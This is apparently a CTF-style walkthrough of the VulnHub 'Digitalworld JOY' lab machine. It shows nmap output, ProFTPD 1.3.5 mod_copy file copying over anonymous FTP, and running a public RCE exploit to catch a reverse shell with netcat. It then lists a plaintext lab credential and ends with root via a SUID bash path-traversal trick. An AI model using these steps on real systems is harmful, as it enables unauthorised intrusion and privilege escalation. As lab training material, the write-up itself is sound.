Digitalworld JOY ~ VulnHub
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "192.168.72.130 joy.vhub" >> /etc/hosts
Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
โโโ(root๐nee)-[~/boxes/vulnhub/digitalworldJOY]
โโ# nmap -Pn -sV -sC -oN initial joy.vhub Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-25 04:34 EST
Nmap scan report for joy.vhub (192.168.72.133)
Host is up (0.000046s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:04:EF:C6 (VMware)
Service Info: Hosts: The, JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-02-25T17:34:41+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-25T09:34:41
|_ start_date: N/AScanning & Enumeration
Based on the scan that was run, I realized that port 21 was running a FTP server and allowed anonymous users to connect and interact.
I then executed the following command to dump the whole anon root to my local system:
wget -m ftp://anonymous:[email protected]
In the downloaded directory was a text file which revealed the directory listing of the user patrick. In there was an interesting file named version_control
I then used the unsecured FTP server to copy this file from the user patrick's home directory to the anon root's ftp directory. By this way I could view it locally without having access to the machine.
site cpft <from>
site cpto <to>
This file revealed that the machine was running ProFTPd: 1.3.5. After digging the net for awhile, I found this RCE exploit on github for this particular version of ProFTPd.
Exploitation
โโโ(root๐nee)-[~/boxes/vulnhub/digitalworldJOY]
โโ# wget https://raw.githubusercontent.com/thegingerninja/ProFTPd_1_3_5_mod_copy_exploit/master/exploit_proftd_1_3_5.py
โโโ(root๐nee)-[~/boxes/vulnhub/digitalworldJOY]
โโ# ./exploit_proftd_1_3_5.py <target IP> <Target web dir> <Local IP> <Local Port>
I then caught the incoming shell with a netcat listener.
Lateral Movement
I then ran linpeas.sh as always which revealed an interesting file in the web directory.
Accessing this file gave me access to user patrick's credentials but not root.
patrick:apollo098765Privilege Escalation
I first ran sudo -l to check for any binaries that the user patrick was authorized to run as root.
This revealed that patrick could run this one binary test with sudo perms.
The binary seemed to be some sort of application which can be used to change perms of files. My theory was to set sticky [SUID] bit on the bash binary and exploit the -p option that bash had. Read More
I then ran the application and when prompted for the file name in "this directory", I specified ../../../../../bin/bash. This would ensure that I climb out of "this directory"
Lastly, I ran /bin/bash -p and gained root access to the machine~!
ROOTY!
